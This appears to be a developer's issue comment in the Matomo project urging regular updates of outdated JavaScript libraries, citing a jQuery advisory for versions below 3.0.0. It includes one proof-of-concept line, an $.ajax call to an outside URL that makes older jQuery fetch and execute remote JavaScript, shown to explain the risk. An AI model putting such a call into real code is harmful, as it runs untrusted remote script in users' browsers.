I know this is a tedious task with no direct benefit, but the possibility of breaking some things.

But most JS libraries haven't been updated since Piwik 3 in 2016. And since then many things changed, new browsers appeared and security issues were found.

One of the largest that (kind of) affects Matomo is https://nodesecurity.io/advisories/328 which affects all jQuery versions <3.0.0
Simply said running

$.ajax('http://sakurity.com/jqueryxss')

in Matomo executes the JavaScript at http://sakurity.com/jqueryxss.
Thankfully @sgiehl had the great foresight 6 years ago when creating the ajaxhelper (in 9979315) to fallback to "json" as a format, so I think Matomo isn't affected.

But I still think that updating JS regularly will avoid possible future issues.

(The same can be said for composer dependencies, but thanks to the new npm audit command, checking for security issues in frontend libraries was easier)
Update: It seems like https://packagist.org/packages/roave/security-advisories is something similar for php dependencies